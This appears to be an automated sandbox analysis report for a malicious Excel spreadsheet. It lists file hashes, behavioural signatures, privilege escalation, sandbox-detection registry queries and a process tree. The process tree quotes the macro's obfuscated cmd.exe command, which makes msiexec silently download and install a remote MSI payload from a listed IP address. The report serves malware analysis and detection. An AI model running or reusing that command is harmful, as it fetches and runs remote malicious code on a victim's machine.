Analysis
Max time kernel: 134s
Max time network: 135s
Platform: windows10_x64
Resource: win10
Submitted: 30-06-2020 12:33
Static task: static1
Behavioral task: behavioral1
  Sample: 978905601.xls
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 978905601.xls
  Resource: win10
General
Target: 978905601.xls
Size: 172KB
MD5: 2a6b788cb122676d3890312e754bfc90
SHA1: 5744f5012d120edd79f1bb1ed0272b28712127e4
SHA256: 0018a5d18456d36582b1020be78a055c9c126a8036c618ea956faf722d995bb2
SHA512: 39a0f085979668395beb3d7a23144cbfeba6c849586bc7a4c5759dc455f3964877ea57795df19bf560a4c9a03a283f0671d656888c8969f8cb7ac58e84cc12a5
Malware Config
Signatures
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
  - EXCEL.EXE (pid 792)
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
  - msiexec.exe (pid 744)
  - msiexec.exe (pid 744)
Executes dropped EXE (1 IoC)
  Processes:
  - MSI3B7.tmp (pid 3752)
Suspicious use of AdjustPrivilegeToken (44 IoCs)
  Processes (token, pid, process):
  - SeShutdownPrivilege (pid 3588, msiexec.exe)
  - SeIncreaseQuotaPrivilege (pid 3588, msiexec.exe)
  - SeSecurityPrivilege (pid 744, msiexec.exe)
  - SeCreateTokenPrivilege (pid 3588, msiexec.exe)
  - SeAssignPrimaryTokenPrivilege (pid 3588, msiexec.exe)
  - SeLockMemoryPrivilege (pid 3588, msiexec.exe)
  - SeIncreaseQuotaPrivilege (pid 3588, msiexec.exe)
  - SeMachineAccountPrivilege (pid 3588, msiexec.exe)
  - SeTcbPrivilege (pid 3588, msiexec.exe)
  - SeSecurityPrivilege (pid 3588, msiexec.exe)
  - SeTakeOwnershipPrivilege (pid 3588, msiexec.exe)
  - SeLoadDriverPrivilege (pid 3588, msiexec.exe)
  - SeSystemProfilePrivilege (pid 3588, msiexec.exe)
  - SeSystemtimePrivilege (pid 3588, msiexec.exe)
  - SeProfSingleProcessPrivilege (pid 3588, msiexec.exe)
  - SeIncBasePriorityPrivilege (pid 3588, msiexec.exe)
  - SeCreatePagefilePrivilege (pid 3588, msiexec.exe)
  - SeCreatePermanentPrivilege (pid 3588, msiexec.exe)
  - SeBackupPrivilege (pid 3588, msiexec.exe)
  - SeRestorePrivilege (pid 3588, msiexec.exe)
  - SeShutdownPrivilege (pid 3588, msiexec.exe)
  - SeDebugPrivilege (pid 3588, msiexec.exe)
  - SeAuditPrivilege (pid 3588, msiexec.exe)
  - SeSystemEnvironmentPrivilege (pid 3588, msiexec.exe)
  - SeChangeNotifyPrivilege (pid 3588, msiexec.exe)
  - SeRemoteShutdownPrivilege (pid 3588, msiexec.exe)
  - SeUndockPrivilege (pid 3588, msiexec.exe)
  - SeSyncAgentPrivilege (pid 3588, msiexec.exe)
  - SeEnableDelegationPrivilege (pid 3588, msiexec.exe)
  - SeManageVolumePrivilege (pid 3588, msiexec.exe)
  - SeImpersonatePrivilege (pid 3588, msiexec.exe)
  - SeCreateGlobalPrivilege (pid 3588, msiexec.exe)
  - SeRestorePrivilege (pid 744, msiexec.exe)
  - SeTakeOwnershipPrivilege (pid 744, msiexec.exe)
  - SeRestorePrivilege (pid 744, msiexec.exe)
  - SeTakeOwnershipPrivilege (pid 744, msiexec.exe)
  - SeRestorePrivilege (pid 744, msiexec.exe)
  - SeTakeOwnershipPrivilege (pid 744, msiexec.exe)
  - SeRestorePrivilege (pid 744, msiexec.exe)
  - SeTakeOwnershipPrivilege (pid 744, msiexec.exe)
  - SeRestorePrivilege (pid 744, msiexec.exe)
  - SeTakeOwnershipPrivilege (pid 744, msiexec.exe)
  - SeRestorePrivilege (pid 744, msiexec.exe)
  - SeTakeOwnershipPrivilege (pid 744, msiexec.exe)
Blacklisted process makes network request (1 IoC)
  Processes:
  - msiexec.exe (flow 8, pid 744)
Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)
Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes:
  - EXCEL.EXE (pid 792), 12 occurrences
Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process: cmd.exe (pid 3188), parent EXCEL.EXE (pid 792)
Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
  - PID 792 wrote to memory of 3188: EXCEL.EXE (pid 792) -> cmd.exe
  - PID 792 wrote to memory of 3188: EXCEL.EXE (pid 792) -> cmd.exe
  - PID 3188 wrote to memory of 3588: cmd.exe (pid 3188) -> msiexec.exe
  - PID 3188 wrote to memory of 3588: cmd.exe (pid 3188) -> msiexec.exe
  - PID 744 wrote to memory of 3752: msiexec.exe (pid 744) -> MSI3B7.tmp
  - PID 744 wrote to memory of 3752: msiexec.exe (pid 744) -> MSI3B7.tmp
  - PID 744 wrote to memory of 3752: msiexec.exe (pid 744) -> MSI3B7.tmp
Use of msiexec (install) with remote resource (1 IoC)
  Processes:
  - msiexec.exe (pid 3588)
Drops file in Windows directory (6 IoCs)
  Processes:
  - File opened for modification: C:\Windows\Installer\ (msiexec.exe)
  - File created: C:\Windows\Installer\inprogressinstallinfo.ipi (msiexec.exe)
  - File opened for modification: C:\Windows\Installer\MSI26D.tmp (msiexec.exe)
  - File opened for modification: C:\Windows\Installer\MSI3B7.tmp (msiexec.exe)
  - File opened for modification: C:\Windows\Installer\MSIFDF7.tmp (msiexec.exe)
  - File opened for modification: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log (msiexec.exe)
Enumerates connected drives (3 TTPs)
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\978905601.xls"
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/978905601.msi /qn
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\msiexec.exe (depth 3)
      Command line: msiExec /i http://199.195.250.60/gg/978905601.msi /qn
      - Suspicious use of AdjustPrivilegeToken
      - Use of msiexec (install) with remote resource
C:\Windows\system32\msiexec.exe (depth 1)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Blacklisted process makes network request
  - Suspicious use of WriteProcessMemory
  - Drops file in Windows directory
  C:\Windows\Installer\MSI3B7.tmp (depth 2)
    Command line: "C:\Windows\Installer\MSI3B7.tmp"
    - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Windows\Installer\MSI3B7.tmp
- C:\Windows\Installer\MSI3B7.tmp
- memory/3188-2-0x0000000000000000-mapping.dmp
- memory/3588-3-0x0000000000000000-mapping.dmp
- memory/3588-4-0x00000155C9F40000-0x00000155C9F44000-memory.dmp (Filesize: 16KB)
- memory/3752-5-0x0000000000000000-mapping.dmp